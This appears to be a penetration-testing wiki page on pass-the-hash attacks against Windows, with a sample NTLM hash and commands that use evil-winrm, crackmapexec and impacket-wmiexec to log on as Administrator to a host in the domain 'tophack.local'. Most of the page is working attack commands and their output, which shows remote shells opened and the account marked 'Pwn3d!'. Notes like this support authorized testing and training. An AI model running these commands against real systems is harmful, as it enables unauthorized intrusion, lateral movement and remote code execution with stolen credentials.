-
Notifications
You must be signed in to change notification settings - Fork 0
Pass the Hash
Maximilian Birnbacher edited this page Apr 23, 2024
·
1 revision
After finding a hash with elevated or desired credentials, perform a pass-the-hash to logon as the wanted user
Example hash: e52d9c51eade9526fb936c716ec3dde1
evil-winrm is a simple and easy to use tool that can be used to connect to the remote management port and get a shell.
evil-winrm -i 172.27.12.20 -u 'Administrator' -H 'e52d9c51eade9526fb936c716ec3dde1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Does not create a shell but can be used to validate if a PtH is possible
crackmapexec smb 172.27.12.20 -u Administrator -H e52d9c51eade9526fb936c716ec3dde1
SMB 172.27.12.20 445 TOPHACK-DC [*] Windows 10.0 Build 17763 x64 (name:TOPHACK-DC) (domain:tophack.local) (signing:True) (SMBv1:False)
SMB 172.27.12.20 445 TOPHACK-DC [+] tophack.local\Administrator:e52d9c51eade9526fb936c716ec3dde1 (Pwn3d!)crackmapexec is mostly impacket. The default execution method is called wmiexec which also can be used standalone
impacket-wmiexec tophack.local/Administrator@172.27.12.20 -hashes aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>